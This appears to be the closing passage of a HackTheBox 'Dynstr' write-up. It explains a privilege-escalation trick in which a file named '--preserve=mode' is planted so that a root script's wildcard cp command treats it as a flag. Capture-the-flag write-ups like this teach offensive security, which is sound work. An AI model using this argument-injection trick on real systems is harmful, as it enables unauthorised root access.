</pre></table></code></div></div><p>and after that, checking config file with <a href="https://linux.die.net/man/8/named-checkconf">named-checkconf</a> utility, which is not so important because our exploit present in this wildcard.</p><p><code class="language-plaintext highlighter-rouge">cp</code> command have a flag from <a href="https://man7.org/linux/man-pages/man1/cp.1.html">man page</a></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre> <span class="nt">-p</span>     same as <span class="nt">--preserve</span><span class="o">=</span>mode,ownership,timestamps

 <span class="nt">--preserve</span><span class="o">[=</span>ATTR_LIST]
          preserve the specified attributes <span class="o">(</span>default: mode,ownership,timestamps<span class="o">)</span>,
          <span class="k">if </span>possible additional attributes: context, links, xattr, all
</pre></table></code></div></div><p>this flag allow to preserve(as the name suggest) same permission which file currently have for any user who copy that file.</p><p>and same as tar wildcard exploit we create a file named <code class="language-plaintext highlighter-rouge">--preserve=mode</code>. When script run <code class="language-plaintext highlighter-rouge">cp</code> command this that file as a command flag as copy all file from current directory with same permissions which files currently have for any user who run the script into <code class="language-plaintext highlighter-rouge">/etc/bind/named.bindmgr/</code>.</p><p><img data-src="/assets/img/posts/dynstr/dynstr-rooted.png" alt="" data-proofer-ignore></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a>, <a href='/categories/linux/'>linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/isc-bind-dnsserver-9-16-1/" class="post-tag no-text-decoration" >isc bind dnsserver 9.16.1</a> <a href="/tags/dyn-api/" class="post-tag no-text-decoration" >dyn api</a> <a href="/tags/command-injection/" class="post-tag no-text-decoration" >command injection</a> <a href="/tags/dns-pointer-record/" class="post-tag no-text-decoration" >dns pointer record</a> <a href="/tags/ptr/" class="post-tag no-text-decoration" >ptr</a> <a href="/tags/wildcard-in-cp/" class="post-tag no-text-decoration" >Wildcard in cp</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox - Dynstr - Poorduck&amp;url=https://x00tex.github.io/posts/dynstr/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox - Dynstr - Poorduck&amp;u=https://x00tex.github.io/posts/dynstr/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://x00tex.github.io/posts/dynstr/&amp;text=Hackthebox - Dynstr - Poorduck" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/meta/">Hackthebox - Meta</a><li><a href="/posts/pandora/">Hackthebox - Pandora</a><li><a href="/posts/writer/">Hackthebox - Writer</a><li><a href="/posts/blunder/">Hackthebox - Blunder</a><li><a href="/posts/luanne/">Hackthebox - Luanne</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/unicode/"><div class="card-body"> <em class="timeago small" data-ts="1638383400" > 2021-12-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Unicode</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.126 hackmedia.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux...</p></div></div></a></div><div class="card"> <a href="/posts/writer/"><div class="card-body"> <em class="timeago small" data-ts="1639420200" > 2021-12-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Writer</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.101 writer.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; ...</p></div></div></a></div><div class="card"> <a href="/posts/unbalanced/"><div class="card-body"> <em class="timeago small" data-ts="1606156200" > 2020-11-23 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Unbalanced</h3><div class="text-muted small"><p> Scanning Nmap ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.200 | grep open | awk -F / &#39;{print $1}&#39; ORS=&#39;,&#39;) echo $ports &amp;amp;&amp;amp; nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/cap/" class="btn btn-outline-primary" prompt="Older"><p>Hackthebox - Cap</p></a> <a href="/posts/tentacle/" class="btn btn-outline-primary" prompt="Newer"><p>Hackthebox - Tentacle</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/p00rduck">p00rduck</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
